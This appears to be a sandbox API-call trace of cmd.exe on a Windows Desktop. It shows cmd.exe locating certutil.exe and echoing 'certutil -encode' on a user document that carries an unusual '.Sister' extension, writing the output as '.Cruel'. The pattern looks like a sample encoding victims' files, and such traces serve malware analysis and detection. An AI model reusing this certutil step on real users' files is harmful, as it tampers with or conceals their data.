1 [0220.718] GetEnvironmentStringsW () returned 0x21ed9980080* [0220.718] GetProcessHeap () returned 0x21ed8c70000 [0220.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0220.718] FreeEnvironmentStringsA (penv="=") returned 1 [0220.718] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0220.718] GetProcessHeap () returned 0x21ed8c70000 [0220.718] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0220.718] GetEnvironmentStringsW () returned 0x21ed9980080* [0220.718] GetProcessHeap () returned 0x21ed8c70000 [0220.718] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0220.718] FreeEnvironmentStringsA (penv="=") returned 1 [0220.719] GetProcessHeap () returned 0x21ed8c70000 [0220.719] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95520) returned 1 [0220.719] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0220.719] ??_V@YAXPEAX@Z () returned 0x1 [0220.719] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa5c950, ftCreationTime.dwHighDateTime=0x1d5e5cd, ftLastAccessTime.dwLowDateTime=0xecd45db0, ftLastAccessTime.dwHighDateTime=0x1d5efb4, ftLastWriteTime.dwLowDateTime=0xecd45db0, ftLastWriteTime.dwHighDateTime=0x1d5efb4, nFileSizeHigh=0x0, nFileSizeLow=0x6a6f, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="GQcSsii2kuOdN456.odt.Sister", cAlternateFileName="")) returned 1 [0220.719] GetProcessHeap () returned 0x21ed8c70000 [0220.719] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9980da0, Size=0x244) returned 0x21ed8d66bd0 [0220.719] GetProcessHeap () returned 0x21ed8c70000 [0220.719] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d66bd0) returned 0x244 [0220.719] GetProcessHeap () returned 0x21ed8c70000 [0220.719] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d67e70 [0220.720] GetProcessHeap () returned 0x21ed8c70000 [0220.720] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d67e70, Size=0x58) returned 0x21ed8d67e70 [0220.720] GetProcessHeap () returned 0x21ed8c70000 [0220.720] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67e70) returned 0x58 [0220.720] GetProcessHeap () returned 0x21ed8c70000 [0220.720] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d67ee0 [0220.720] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0220.720] GetProcessHeap () returned 0x21ed8c70000 [0220.720] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x48) returned 0x21ed8c7bc60 [0220.720] ??_V@YAXPEAX@Z () returned 0x1 [0220.720] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0220.720] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cee0 [0220.721] FindClose (in: hFindFile=0x21ed8c7cee0 | out: hFindFile=0x21ed8c7cee0) returned 1 [0220.721] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cb80 [0220.721] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0220.721] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xae2116e3, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xae2116e3, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cfa0 [0220.721] FindClose (in: hFindFile=0x21ed8c7cfa0 | out: hFindFile=0x21ed8c7cfa0) returned 1 [0220.721] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\GQcSsii2kuOdN456.odt.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa5c950, ftCreationTime.dwHighDateTime=0x1d5e5cd, ftLastAccessTime.dwLowDateTime=0xecd45db0, ftLastAccessTime.dwHighDateTime=0x1d5efb4, ftLastWriteTime.dwLowDateTime=0xecd45db0, ftLastWriteTime.dwHighDateTime=0x1d5efb4, nFileSizeHigh=0x0, nFileSizeLow=0x6a6f, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="GQcSsii2kuOdN456.odt.Sister", cAlternateFileName="GQCSSI~1.SIS")) returned 0x21ed8c7cbe0 [0220.722] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0220.722] _wcsnicmp (_String1="GQCSSI~1.SIS", _String2="GQcSsii2kuOdN456.odt.Sister", _MaxCount=0x1b) returned 21 [0220.722] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0220.722] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0220.722] GetProcessHeap () returned 0x21ed8c70000 [0220.722] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8c7bda0 [0220.722] ??_V@YAXPEAX@Z () returned 0x1 [0220.722] ??_V@YAXPEAX@Z () returned 0x1 [0220.722] GetProcessHeap () returned 0x21ed8c70000 [0220.722] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d67ee0, Size=0x230) returned 0x21ed8d67ee0 [0220.722] GetProcessHeap () returned 0x21ed8c70000 [0220.722] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d67ee0) returned 0x230 [0220.722] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0220.722] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.722] GetFileType (hFile=0x50) returned 0x2 [0220.722] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.722] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0220.723] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.723] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0220.729] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0220.730] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0220.730] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0220.730] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0220.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.730] GetFileType (hFile=0x50) returned 0x2 [0220.730] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.730] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0220.730] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.730] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0220.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.731] GetFileType (hFile=0x50) returned 0x2 [0220.731] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.731] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0220.731] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.731] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d67e80*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d67e80*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0220.732] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"GQcSsii2kuOdN456.odt.Sister\" \"GQcSsii2kuOdN456.odt.Cruel\" ") returned 68 [0220.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.732] GetFileType (hFile=0x50) returned 0x2 [0220.732] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.732] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0220.732] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.732] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x44, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x44) returned 1 [0220.733] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0220.733] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.733] GetFileType (hFile=0x50) returned 0x2 [0220.733] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0220.733] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0220.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0220.734] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0220.740] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0220.740] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0220.740] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0220.740] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0220.740] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0220.741] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0220.741] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0220.741] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0220.741] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0220.741] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0220.741] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0220.741] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0220.741] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0220.741] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0220.741] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0220.741] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0220.741] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0220.741] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0220.741] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0220.741] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0220.741] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0220.741] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0220.741] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0220.741] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0220.741] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0220.741] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0220.741] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0220.741] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0220.741] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0220.741] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0220.741] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0220.742] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0220.742] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0220.742] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0220.742] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0220.742] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0220.742] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0220.742] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0220.742] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0220.742] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0220.742] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0220.742] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0220.742] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0220.742] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0220.742] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0220.742] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0220.742] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0220.742] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0220.742] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0220.742] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0220.742] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0220.742] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0220.742] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0220.742] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0220.742] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0220.743] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0220.743] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0220.743] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0220.743] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0220.743] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0220.743] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0220.743] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0220.743] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0220.743] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0220.743] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0220.743] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0220.743] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0220.743] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0220.743] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0220.743] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0220.743] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0220.743] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0220.743] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0220.743] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0220.743] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0220.743] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0220.743] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0220.743] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0220.743] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0220.743] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0220.744] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0220.744] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0220.744] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0220.744] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0220.744] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0220.744] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0220.744] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0220.744] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0220.744] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0220.744] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0220.744] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0220.744] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0220.744] ??_V@YAXPEAX@Z () returned 0x1 [0220.744] GetProcessHeap () returned 0x21ed8c70000 [0220.744] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8ce9880 [0220.744] GetProcessHeap () returned 0x21ed8c70000 [0220.744] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xaa) returned 0x21ed8c96a00 [0220.744] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0220.744] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0220.745] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0220.745] GetProcessHeap () returned 0x21ed8c70000 [0220.745] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed8cf9870 [0220.746] SetErrorMode (uMode=0x0) returned 0x0 [0220.746] SetErrorMode (uMode=0x1) returned 0x0 [0220.746] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed8cf9880, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0220.746] SetErrorMode (uMode=0x0) returned 0x1 [0220.746] GetProcessHeap () returned 0x21ed8c70000 [0220.746] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cf9870, Size=0x52) returned 0x21ed8cf9870 [0220.746] GetProcessHeap () returned 0x21ed8c70000 [0220.746] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cf9870) returned 0x52 [0220.746] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0220.746] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0220.746] GetProcessHeap () returned 0x21ed8c70000 [0220.746] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5f470 [0220.746] GetProcessHeap () returned 0x21ed8c70000 [0220.746] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8c75c30 [0220.747] GetProcessHeap () returned 0x21ed8c70000 [0220.747] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c75c30, Size=0x1be) returned 0x21ed8c75c30 [0220.747] GetProcessHeap () returned 0x21ed8c70000 [0220.747] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c75c30) returned 0x1be [0220.747] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.747] GetProcessHeap () returned 0x21ed8c70000 [0220.747] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8d42910 [0220.747] GetProcessHeap () returned 0x21ed8c70000 [0220.747] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d42910, Size=0x7e) returned 0x21ed8d42910 [0220.747] GetProcessHeap () returned 0x21ed8c70000 [0220.747] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d42910) returned 0x7e [0220.747] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.747] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0220.748] GetLastError () returned 0x2 [0220.748] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.748] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0220.748] GetLastError () returned 0x2 [0220.748] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.748] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ce80 [0220.749] FindClose (in: hFindFile=0x21ed8c7ce80 | out: hFindFile=0x21ed8c7ce80) returned 1 [0220.749] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0220.749] GetLastError () returned 0x2 [0220.749] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cdc0 [0220.749] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0220.749] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0220.749] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0220.749] ??_V@YAXPEAX@Z () returned 0x1 [0220.749] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0220.753] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0220.753] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0220.753] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0220.753] GetProcessHeap () returned 0x21ed8c70000 [0220.753] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45cb0 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.753] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.754] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 